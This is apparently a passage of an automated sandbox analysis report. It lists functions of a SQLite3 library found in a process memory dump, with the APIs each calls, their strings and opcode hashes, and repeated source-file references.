                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                              • String ID:
                                              • API String ID: 1465156292-0
                                              • Opcode ID: 0ed4e0a5a77a592cdeba55340840835901b7fdc315b93dece7b8fd153b8fcef5
                                              • Instruction ID: f8195ebcc9755160ea21dc83196959cce359993cfa35b36774d6f4ae8db7ef3d
                                              • Opcode Fuzzy Hash: 0ed4e0a5a77a592cdeba55340840835901b7fdc315b93dece7b8fd153b8fcef5
                                              • Instruction Fuzzy Hash: 95014B307003068BC704CF6AD480A4AFBB4FF88364F14C669D8188B301D375E991CBD0
                                              Function 61E22E72 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 61E22CD3: sqlite3_log.SQLITE3 ref: 61E22D01
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E22EB1
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                              • String ID:
                                              • API String ID: 1465156292-0
                                              • Opcode ID: 80c3d755bc8b9e97669640064c66ccd29dec51db239fe43ec5e8644a4c1d70f0
                                              • Instruction ID: 629c0099932dde4913feb8e7a252eaa5a166db3329ea927dd6b33652f752c327
                                              • Opcode Fuzzy Hash: 80c3d755bc8b9e97669640064c66ccd29dec51db239fe43ec5e8644a4c1d70f0
                                              • Instruction Fuzzy Hash: C0F05E7970021A9F8B00DF69D9C089EB7B9FF89264B14C025EC049B305D330E956CF91
                                              Function 61E22EE7 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 61E22CD3: sqlite3_log.SQLITE3 ref: 61E22D01
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E22F0A
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                              • String ID:
                                              • API String ID: 1465156292-0
                                              • Opcode ID: 64dfb7082bc54c54a9c65e2aa7ec5c3ea96676263761913225c0d3e076ea7d54
                                              • Instruction ID: 5d004cdb1aad573966e290958758304d97c27c36e44804814a1bd20be4c54ecf
                                              • Opcode Fuzzy Hash: 64dfb7082bc54c54a9c65e2aa7ec5c3ea96676263761913225c0d3e076ea7d54
                                              • Instruction Fuzzy Hash: 75E08C74A0460A9BCB00DFA5C8C080AB7B8EF88258F24C265EC488B305E230E991CF81
                                              Function 61E22EC1 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_bind_int64.SQLITE3 ref: 61E22EE0
                                                • Part of subcall function 61E22E72: sqlite3_mutex_leave.SQLITE3 ref: 61E22EB1
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_bind_int64sqlite3_mutex_leave
                                              • String ID:
                                              • API String ID: 3064317574-0
                                              • Opcode ID: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
                                              • Instruction ID: 227a1d56f5b9a88dd6e33a80bcc87a0388465506533547c4cd1b5d4256ddbe7e
                                              • Opcode Fuzzy Hash: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
                                              • Instruction Fuzzy Hash: 2BD092B4909309AFCB00EF39C48544EBBE4AF88254F40C82DFC98C7310E274E8408F92
                                              Function 61E231B6 Relevance: .0, Instructions: 43COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3581c1989f54e2c4abf0a5065034e82e89ad97904316e78d9fe4de75aae7736b
                                              • Instruction ID: 8af423831553bb48b9d9577830c8fd0c522261f20ff8810cefe13de317688d5c
                                              • Opcode Fuzzy Hash: 3581c1989f54e2c4abf0a5065034e82e89ad97904316e78d9fe4de75aae7736b
                                              • Instruction Fuzzy Hash: 17012875A042599BCF00CE49D8916DEB7B5FB88364F64812AE92497381C236E912CFA0
                                              Function 61E23148 Relevance: .0, Instructions: 28COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 910021f750cc9613730483e89dd353a74cb793664822e205d67b5d4dae7f9a27
                                              • Instruction ID: ddbe0bfe1292ed684f15069fa8ca2e38da9e32b2c25e66667983222cf3637f2d
                                              • Opcode Fuzzy Hash: 910021f750cc9613730483e89dd353a74cb793664822e205d67b5d4dae7f9a27
                                              • Instruction Fuzzy Hash: C1F01C756082199BCB04CE48D4A169A77A4FB09374F30C12AFC1547380C671E951CBD0
                                              Function 61E17E83 Relevance: .0, Instructions: 24COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 439cb87f735b715764a22424ae008460eaf1d90cc02f87ee44df88b9ce880264
                                              • Instruction ID: 219b2b62c3fabec9dfc9dc33426f270a59547de83b23f19a05556cc8d0ac7619
                                              • Opcode Fuzzy Hash: 439cb87f735b715764a22424ae008460eaf1d90cc02f87ee44df88b9ce880264
                                              • Instruction Fuzzy Hash: 01E0123670D3085FBB44CE99EDC1A26B79AF78812CB34C17AED4D8B305D532DC114260
                                              Function 61E2318F Relevance: .0, Instructions: 14COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0cd79c278022c2af276d7ad662afd0b40ecf5fd40577ade0c20f6c2bf6da0c7d
                                              • Instruction ID: b5bd8062da19b0bead2fa2d161c7fc1066c26d2369fbf9c48b1e2f08ba34eba4
                                              • Opcode Fuzzy Hash: 0cd79c278022c2af276d7ad662afd0b40ecf5fd40577ade0c20f6c2bf6da0c7d
                                              • Instruction Fuzzy Hash: EBD042B850530DABDB00CF05D8C099ABBA4FB0C364F508119ED1847341C375E9518EA0
                                              Function 61E23223 Relevance: .0, Instructions: 14COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e41ed7868823feecbe9f7a8037c94bafbb7f30954735038eee146dcf54c940b3
                                              • Instruction ID: f2b2f03a97007f35b7f65032bca51dbcae8dba1f2103a13d6925738f3afb1e64
                                              • Opcode Fuzzy Hash: e41ed7868823feecbe9f7a8037c94bafbb7f30954735038eee146dcf54c940b3
                                              • Instruction Fuzzy Hash: 35D048B860530DABDB00CF0AD8C599ABBA8FB0C364F50811AED184B341C375EA618EA0
                                              Function 61E03373 Relevance: .0, Instructions: 12COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f34905f32e1aecbe37876591cdc5ebd600e017a9785cdc6570551157bb33cf12
                                              • Instruction ID: 1b03f18003e7ac7d2627eb09cc30d622cd7d4d92e5edfe794543ec608bcd062f
                                              • Opcode Fuzzy Hash: f34905f32e1aecbe37876591cdc5ebd600e017a9785cdc6570551157bb33cf12
                                              • Instruction Fuzzy Hash: 5AC012302443088BEB40CAAAD480A6A73E8BB04A26F10C160F858CB710EA30F8628690
                                              Function 61E03361 Relevance: .0, Instructions: 9COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
                                              • Instruction ID: 84ec498ff2f667c8d0f05b335f45381c2a2d64c67f7cfa5841cbc6910f25a2ca
                                              • Opcode Fuzzy Hash: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
                                              • Instruction Fuzzy Hash: C7B09B25614209465714CE559480977779D7784945714C4559C1C85605E735D49151C0
                                              Function 61E0328A Relevance: .0, Instructions: 8COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f2384b3b752d3915b0886f45dcb5b5ae2c3673fd6f6a42dd7d82e2120c80962
                                              • Instruction ID: d3f995c7ed1863e227637fada27606a3e1c89b9f632761dd9b80a54edcbf0309
                                              • Opcode Fuzzy Hash: 0f2384b3b752d3915b0886f45dcb5b5ae2c3673fd6f6a42dd7d82e2120c80962
                                              • Instruction Fuzzy Hash: EAB0123B11030CCB4700DA0DD441CC1B3D8F708E127C54098E40487711D669FC40C685
                                              Function 61E1E43A Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 244COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_str_appendall.SQLITE3 ref: 61E1E51D
                                              • sqlite3_str_appendf.SQLITE3 ref: 61E1E55B
                                              • sqlite3_str_appendf.SQLITE3 ref: 61E1E586
                                              • sqlite3_str_append.SQLITE3 ref: 61E1E6E6
                                              • sqlite3_str_appendf.SQLITE3 ref: 61E1E6FE
                                              • sqlite3_str_append.SQLITE3 ref: 61E1E73D
                                              • sqlite3_str_append.SQLITE3 ref: 61E1E7B9
                                              • sqlite3_str_appendf.SQLITE3 ref: 61E1E7EE
                                              • sqlite3_str_append.SQLITE3 ref: 61E1E86A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_str_appendsqlite3_str_appendf$sqlite3_str_appendall
                                              • String ID: %s=?$0$<expr>$>? AND rowid<$ANY(%s)$AUTOMATIC COVERING INDEX$AUTOMATIC PARTIAL COVERING INDEX$COVERING INDEX %s$INDEX %s$PRIMARY KEY$SCAN$SEARCH$d$rowid
                                              • API String ID: 3937484358-3012697695
                                              • Opcode ID: 84887366ee775c0403e5530a8652ec23100b36a180766444efd908b5098c858d
                                              • Instruction ID: b4b78378d98527f7975b30702cac7e06767522985bb494146bf00e1769c5a960
                                              • Opcode Fuzzy Hash: 84887366ee775c0403e5530a8652ec23100b36a180766444efd908b5098c858d
                                              • Instruction Fuzzy Hash: 34C129B4A087158FDB11CF25C58279ABBF1AF84318F25C8ADE8889B395D374D981CF41
                                              Function 61E2E8FF Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 199COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_is_nt
                                              • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                              • API String ID: 3752053736-2111127023
                                              • Opcode ID: 5d4ae714e9f7b0f63d6e1fe8e807bc266626a84a601cd0afe2345a557b2e993c
                                              • Instruction ID: 8b0d383b7b3723baa77ace844d4edc1225f985f1f35688fd78a88631be78f126
                                              • Opcode Fuzzy Hash: 5d4ae714e9f7b0f63d6e1fe8e807bc266626a84a601cd0afe2345a557b2e993c
                                              • Instruction Fuzzy Hash: EA813B70A08B599FEB01EF7AC49465EBBF1BF89358F24C45EE8998A340D734C845CB52
                                              Function 61E3BE41 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 287COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_free$sqlite3_malloc64sqlite3_mprintf$sqlite3_snprintf$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                              • String ID: .$sqlite3_extension_init$te3_
                                              • API String ID: 2803375525-613441610
                                              • Opcode ID: 020b0297f7e0af56880cb5a91a00a5cb87671c4c101941e2a4f3918f36898185
                                              • Instruction ID: e7aea79412b7d8a8ea34a8e2e7697f456a6b694f30ee55e1d5b7f9de560d154b
                                              • Opcode Fuzzy Hash: 020b0297f7e0af56880cb5a91a00a5cb87671c4c101941e2a4f3918f36898185
                                              • Instruction Fuzzy Hash: 2EC105B0A057599FDB00DFA9C48469EBBF1BF89308F24C46AE8989B310D734D981CF52
                                              Function 61E3B989 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 346COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
